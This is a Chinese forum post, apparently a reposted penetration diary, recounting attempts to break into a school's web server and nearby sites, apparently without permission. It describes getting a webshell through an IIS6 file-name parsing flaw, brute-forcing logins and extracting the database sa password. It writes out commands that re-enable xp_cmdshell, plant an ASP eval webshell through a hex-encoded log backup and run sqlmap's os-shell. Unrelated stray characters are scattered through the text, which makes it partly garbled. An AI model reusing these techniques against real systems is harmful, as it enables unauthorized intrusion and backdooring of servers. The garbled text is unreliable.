來源:http://bbs.ichunqiu.com/thread-9296-1-1.html?from=ch
前奏在這里隶债,傳送門:滲透紀(jì)實(shí)之母校官網(wǎng)不謝临谱。
#線索中斷
等我放學(xué)回家的時(shí)候??不好意思??服務(wù)器掉了 后門掉了??漏洞補(bǔ)了??導(dǎo)致內(nèi)網(wǎng)線索斷了
沒錯(cuò) 斷了 就這樣斷了!
#無奈繼續(xù)擼旁站內(nèi)網(wǎng)
N久搞到個(gè)后臺(tái)
第一次見 powereasy 這個(gè)版本 由于是iis6.0??隨便找個(gè)上傳不改名的的地方上傳類似1.asp;1.jpg之類的文件就能解析
仔細(xì)研究了下??在 系統(tǒng)設(shè)置-模板標(biāo)簽管理-模板管理 底部上傳一個(gè)1.asp;1.html的文件就ok-
左邊我圈的地方 模板名套利,我下載個(gè)程序研究了下路徑推励,是這樣:
根目錄/Template/模板名/binghe.asp;binghe.html
這里就是
***.com/Template/海洋之星模板方案/1.asp;1.html
很容易的拿到了shell
很容易的提權(quán)
是個(gè)內(nèi)網(wǎng),轉(zhuǎn)發(fā)肉迫,然后就沒有然后了验辞,給你兩張圖自己體會(huì)
#不能放棄,但何時(shí)是個(gè)頭喊衫?
為什么還要拿旁站跌造,因?yàn)樯洗文孟碌奶?進(jìn)不去服務(wù)器??無法內(nèi)網(wǎng)滲透
目標(biāo):http://www.********.com
先來張圖
但是不好意思??這是半年前的菜刀緩存,現(xiàn)在已經(jīng)掉了族购,想拿回來進(jìn)內(nèi)網(wǎng)
人老了啊壳贪,就好忘事 忘了怎么拿的了 主頁逛了半天??沒發(fā)現(xiàn)注入啥的 這個(gè)小站你還指望什么xss打管理?幾年登陸一次
找到個(gè)博客的二級目錄
注冊個(gè)用戶進(jìn)去??沒有管理權(quán)限??于是乎收集原博客用戶 著手爆破
我很心痛 這密碼寝杖。违施。。
文件管理各種截?cái)?各種潛規(guī)則測試無果 結(jié)論 :這個(gè)后臺(tái)并無卵用(大派唬可以試試)
接著發(fā)現(xiàn)幾個(gè)都是二級目錄先看OA
小菜見識(shí)短淺 不曾見過這種??更別說漏洞什么的
學(xué)習(xí)了烏云大牛的邏輯漏洞磕蒲,判斷出這里確實(shí)可以用于爆破用戶名留潦,存在的用戶名和不存在的用戶名 腳本給的response不一樣,經(jīng)測試 admin一定是存在的
用burp枚舉密碼嘍辣往,因?yàn)檫@里沒驗(yàn)證嘛兔院,密碼判斷出是admin,登錄試試
嗯站削? 隨便一個(gè)密碼試試坊萝,這樣子
什么鬼?密碼正確還不給進(jìn)去??難道钻哩。屹堰。〗智猓可能限制了ip啥的 或者是什么新的技術(shù)??小菜慚愧
后來轉(zhuǎn)來轉(zhuǎn)去竟然有越權(quán)漏洞
這個(gè)
和這個(gè)
sa密碼出來了??由于是內(nèi)網(wǎng) 直連不行??試著在sql執(zhí)行池里執(zhí)行幾個(gè)語句 哇擦 沒有回顯扯键。
執(zhí)行
[AppleScript]純文本查看復(fù)制代碼
exec master..xp_cmdshell 'ver'
顯示錯(cuò)誤
恢復(fù)一下xp_cmdshell
[AppleScript]純文本查看復(fù)制代碼
1
2EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'declare @o int
sp_addextendedproc 'xp_cmdshell','xpsql70.dll'
再執(zhí)行
[AppleScript]純文本查看復(fù)制代碼
exec master..xp_cmdshell 'ver'
這次不顯錯(cuò)了??說明語句已經(jīng)運(yùn)行??沒有回顯而已
在菜刀緩存里面得到網(wǎng)站絕對路徑 嘗試echo寫shell
[AppleScript]純文本查看復(fù)制代碼
exec master..xp_cmdshell 'echo"123">e:\inetpub\wwwroot\oa\cs\1.asp'
訪問無果 什么鬼? 難道管理員上次發(fā)現(xiàn)被黑??換了服務(wù)器珊肃?
來利用他這個(gè)執(zhí)行錯(cuò)誤就報(bào)錯(cuò)的特性判斷目錄存在
[AppleScript]純文本查看復(fù)制代碼
exec master.dbo.xp_subdirs 'e:\binghesec\';//測試一個(gè)不存在的目錄
果然報(bào)錯(cuò)
[AppleScript]純文本查看復(fù)制代碼
exec master.dbo.xp_subdirs 'e:\inetpub\wwwroot\oa\';//測試原根目錄
不報(bào)錯(cuò)荣刑。。
這我就不明白了 什么鬼伦乔?厉亏???!A液汀0弧!
再試試備份法
[AppleScript]純文本查看復(fù)制代碼
alter database mastersetRECOVERY FULL--
create table cmd(aimage)--
backuplogmastertodisk='c:\cmd1'withinit--
insertintocmd(a)values(0x3C256576616C20726571756573742822612229253E)--
backuplog[northwind]todisk='e:\inetpub\wwwroot\oa\1.asp'--
drop table cmd--
0x3C256576616C20726571756573742822612229253E是hex的<%eval request(“a”)%>
再試試訪問1.asp招刹,同樣是fuck the dog恬试,404,sa 都搞不定 我也是醉了
以下是mssql存儲(chǔ)過程寫文件 都沒成功
[AppleScript]純文本查看復(fù)制代碼
1
2
3
4
5
6exec master.dbo.xp_subdirs 'c:\www\';
exec sp_makewebtask 'c:\www\hack.asp','select''<%execute(request("SB"))%>'' '
declare @o int,@f int,@t int,@ret int
exec sp_oacreate 'scripting.filesystemobject',@o out
exec sp_oamethod @o,'createtextfile',@f out,'c:\testing.txt',1
exec @ret=sp_oamethod @f,'writeline',NULL,<>
看來我得放棄這里了
再回到OA疯暑,看了半天沒什么進(jìn)展训柴,望著主頁發(fā)呆,隨手習(xí)慣性輸入‘or’=’or’ , 點(diǎn)登陸竟然沒反應(yīng) 竟然不提示不存在該用戶 很明顯的注入啦 抓個(gè)包 丟sqlmap
sqlmap -r '/tmp/log.txt'
–is-dba返回yes??來–os-shell,結(jié)果令我失望
注意看我圈的地方??說明取得不到回顯 這對我們獲得信息很不利
大牛說在os-shell無回顯的情況下妇拯,寫一個(gè)cmd命令??下面這里選n幻馁,命令其實(shí)已經(jīng)運(yùn)行了
執(zhí)行echo寫個(gè)shell到根目錄 試試訪問 也不行
直接cmd不行 那咱來sql-shell自己執(zhí)行試試 還是不行
百般無奈??退而求其次??跑數(shù)據(jù)??進(jìn)后臺(tái)。
竟然是這樣越锈,誰能告訴我為什么sa竟然跑不出數(shù)據(jù)??
嘗試編碼 —hex 和—no-cast 也是不行
說到這里??我已經(jīng)什么都不想說了 給我根繩子吧??結(jié)實(shí)點(diǎn)的仗嗦!
#結(jié)語
說了這么多就是沒搞下!還得多學(xué)習(xí)甘凭!
未完待續(xù)稀拐,下篇終結(jié) ,有些知識(shí)點(diǎn)還是可以看看的哦对蒲。
